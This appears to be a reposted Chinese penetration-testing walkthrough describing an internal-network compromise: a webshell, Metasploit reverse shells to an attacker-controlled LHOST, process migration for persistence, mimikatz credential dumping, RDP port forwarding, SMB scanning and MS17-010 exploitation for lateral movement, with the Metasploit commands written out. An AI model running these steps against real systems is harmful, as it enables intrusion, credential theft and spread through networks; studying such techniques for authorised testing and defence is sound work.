安基網 首頁 安全 滲透測試 查看內容

新手內網滲透思路

2020-1-20 13:16| 投稿: xiaotiger |來自: 互聯網


免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!

摘要: 運用到的一些msf攻擊手法獲得shellGetshell的過程沒什么好說的,無非簡單的后臺弱口令到上傳然后冰蝎連接getshell。獲得shell后,模擬終端ping 8.8.8.8有返回包,說明該服務器與外網互通。既然跟外網互通,那么可以嘗試直接使用msf的exploit/multi/handler配合冰蝎反彈shell來獲得sessionuse exploit/m ...

運用到的一些msf攻擊手法

獲得shell

Getshell的過程沒什么好說的,無非簡單的后臺弱口令到上傳然后冰蝎連接getshell。獲得shell后,模擬終端ping 8.8.8.8有返回包,說明該服務器與外網互通。

既然跟外網互通,那么可以嘗試直接使用msf的exploit/multi/handler配合冰蝎反彈shell來獲得session

use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost xxx.xxx.xxx.xxxset lport 5665run

但是結果很不盡人意,沒能夠成功獲得session。在使用冰蝎模擬終端收集信息過程中,發現本地有powershell進程。

再次打開msf,本次嘗試使用web_delivery配合終端執行powershell指令來獲得session。

User exploit/multi/script/web_deliverySet targets 2set payload windows/x64/meterpreter/reverse_httpsset lhost xxx.xxx.xxx.xxxset lport 4332set srvportrun


獲得payload,使用冰蝎或者C刀模擬終端直接執行,成功獲得session,執行getuid發現權限為system權限,省去了提權過程。

權限維持

為了獲得一個持久穩定的高權限session,我們需要將當前的session進程遷移到一個持久、堅挺又穩定的進程上,防止突然暴斃

我們使用ps查看當前進程,然后選中一個看起來比較持久的幸運兒spoolsv.exe(這是一個用來控制打印的進程,我遇到的機器基本都開啟了此進程)注意:選擇進程的時候優先選擇系統進程,這種比較持久且為system權限

migrate 進程號getpid

內網信息搜集

不管是在什么類型的滲透環境下,信息搜集永遠是不可缺少的一環,他決定了你滲透的效率,可以讓你在滲透過程中少走很多彎路,畢竟在項目上尤其是紅藍攻防中,最缺的永遠是時間

接下來,查看IP信息以及arp緩存,查看網段分布情況:

發現該服務器只存在192.168.10.0/24網段的信息于是繼續查看其他信息

Netstat -ano

發現服務器開放3389端口:

既然開啟了3389端口,我們使用端口轉發,登錄到服務器看看有沒有意外收獲。

portfwd add -l 6666 -p 3389 -r 127.0.0.1

IP有了,3389開了,現在我們缺少的是用戶名密碼直接meterpreter下加載mimikatz

Load mimikatzWdigest

比較遺憾的是沒能獲取到明文密碼,但是我這邊使用cobalt strike加載的mimikatz成功獲取到明文密碼emmm總之搞不懂的地方先歸為玄學問題

現在,密碼也有了,mstsc鏈接目標3389端口成功此處涉及的敏感信息較多,放棄截圖,我盡量用語言表述清楚思路上傳netpass查看rdp緩存,無果,但是發現系統有VNC

VNC:VNC (Virtual Network Console)是虛擬網絡控制臺的縮寫,是一款遠程控制工具軟件。

查看VNC相關文件發現新的網段信息,但是沒有保存的連接信息,不過能獲得新的網段信息也是知足了

橫向

至此,信息收集部分其實也就差不多,接下來我們開始嘗試橫向移動

根據之前發現的網段信息以及服務器本機的路由信息,我們手動添加路由

Run autoroute -s 192.168.10.0/24Run autoroute -s 172.16.0.0/24……

其他網段同理,添加路由之后bg退回到控制臺先使用auxiliary/scanner/smb/smb_version模塊掃描一下各網段的smb服務開啟情況

Use auxiliary/scanner/smb/smb_versionset rhosts 192.168.10.0/24set threads 10run

可以看到,活著的機器還挺多。

然后,使用auxiliary/scanner/smb/psexec_loggedin_users模塊配合已獲得的兩組賬戶密碼進行橫向

Use auxiliary/scanner/smb/psexec_loggedin_usersSet rhosts 192.168.10.0/24Set smbuser usernameSet smbpass passwordSet threads 5run

尷尬,橫向失敗,居然沒有用同賬戶密碼

既然橫向失敗,可以考慮最簡單的,但也是最實用的大殺器,ms17-010先使用scanner模塊掃描一下哪些機器可能存在ms17-010的漏洞

Use auxiliary/scanner/smb/smb_ms17_010Set rhosts 192.168.10.0/24Set thread 20Run

由于打ms17-010的流量比較大,為了防止死掉,我根據掃描出來的結果,針對性的選擇一臺感覺比較容易搞的目標,單獨打。此處試了很多機器,好多都打了補丁,不過也有漏網之魚,此處單獨拿一臺示例:Use auxiliary/admin/smb/ms17_010_commandset rhost 192.168.10.18set command whoamirun

成功執行,是system權限,同理command換成彈shell的命令,便可以獲得該機器的權限。

獲得新機器的權限之后,便可以圍繞新機器進行新一輪的信息搜集,然后不斷橫向,進一步擴大內網戰果,以下,就不在多做測試。另外對于ms17-010,如果說打2003的機器,建議使用auxiliary/admin/smb/ms17_010_command模塊進行執行命令獲得session;其他的可以直接使用exploit/windows/smb/ms17_010_eternalblue或者exploit/windows/smb/ms17_010_psexec來直接獲得session。

寫在最后

提醒家:道路千萬條,安全第一條;滲透不規范,親人兩行淚。以上滲透測試過程純屬本人杜撰,滲透是不可能滲透的,這輩子都不可能滲透的。如果你還沒懂那我也沒辦法啦



小編推薦:欲學習電腦技術、系統維護、網絡管理、編程開發和安全攻防等高端IT技術,請 點擊這里 注冊賬號,公開課頻道價值萬元IT培訓教程免費學,讓您少走彎路、事半功倍,好工作升職加薪!

本文出自:https://www.toutiao.com/i6783584934658310670/

免責聲明:本站系公益性非盈利IT技術普及網,本文由投稿者轉載自互聯網的公開文章,文末均已注明出處,其內容和圖片版權歸原網站或作者所有,文中所述不代表本站觀點,若有無意侵權或轉載不當之處請從網站右下角聯系我們處理,謝謝合作!


鮮花

握手

雷人

路過

雞蛋

相關閱讀

最新評論

 最新
返回頂部
创业如何赚钱